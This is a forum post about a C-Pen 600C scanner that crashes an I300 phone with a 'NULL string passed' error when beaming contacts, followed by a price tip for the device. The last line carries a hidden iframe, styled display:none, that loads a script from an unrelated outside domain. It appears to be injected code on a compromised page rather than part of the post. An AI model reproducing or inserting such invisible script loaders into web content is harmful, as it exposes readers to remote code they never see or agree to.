I just bought my newest gadget to go with my I300, a model 600C C-Pen. For those not familiar with this device, check out the company's website at www.cpen.com.

The unit seems pretty neat so far, but I'm having trouble beaming address book entries from the C-Pen to the I300. I've experimented with different entries, but each time I get the following error message on the phone: StringMgr.c, Line:67, NULL string passed. To clear that error message I have to reset the phone. Transferring information from the I300 to the C-Pen seems to work OK, but not from the C-Pen to the I300.

Does anyone have any idea what's causing the problem? I have a call in to C-Pen's tech support department, but so far they haven't gotten back to me.

Incidentally, if anybody is interested in purchasing a C-Pen, the best price seems to be on Amazon.com. They are selling it for around $58.00 (with free shipping!). That's about $20 less than I paid on eBay !<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>